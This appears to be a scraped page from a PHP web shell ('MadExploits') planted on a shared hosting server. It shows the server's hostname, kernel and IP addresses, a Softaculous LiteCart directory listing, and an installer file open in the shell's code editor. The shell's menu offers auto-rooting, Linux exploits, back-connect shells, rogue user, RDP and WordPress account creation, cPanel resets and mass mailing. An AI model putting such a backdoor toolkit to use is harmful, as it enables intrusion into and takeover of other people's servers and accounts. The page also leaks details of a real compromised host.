Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.143
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
litecart /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
10.9
KB
-rw-r--r--
clone.php
5.38
KB
-rw-r--r--
edit.php
7.08
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
8.75
KB
-rw-r--r--
fileindex.php
101
B
-rw-r--r--
import.php
3.28
KB
-rw-r--r--
info.xml
3.09
KB
-rw-r--r--
install.js
1.02
KB
-rw-r--r--
install.php
10.61
KB
-rw-r--r--
install.xml
27.94
KB
-rw-r--r--
litecart.zip
1.33
MB
-rw-r--r--
md5
2.57
KB
-rw-r--r--
notes.txt
1.14
KB
-rw-r--r--
robots.txt
118
B
-rw-r--r--
update_pass.php
497
B
-rw-r--r--
upgrade.php
60.46
KB
-rw-r--r--
upgrade.xml
990
B
-rw-r--r--
write_htpass.php
615
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : write_htpass.php
<?php $username = '[[admin_username]]'; $enc_password = '[[encrypted_pass]]'; $htpasswd_file = '[[softpath]]/[[admin_folder]]/.htpasswd'; $htpasswd = file_get_contents($htpasswd_file); if(preg_match('#(?<=^|\r\n|\r|\n)\#*('. preg_quote($username, '#') .'):.*?#', $htpasswd)){ $htpasswd = preg_replace('#(?<=^|\r\n|\r|\n)(\#*'. preg_quote($username, '#') .'):[^\r|\n]+(\r\n?|\n)*#', '$1:{SHA}'. $enc_password . PHP_EOL, $htpasswd); echo '<htpasswd>'.$htpasswd.'</htpasswd>'; } if(is_writable($htpasswd_file)){ $htpasswd = file_put_contents($htpasswd_file, $htpasswd); } @unlink('write_htpass.php'); ?>
Close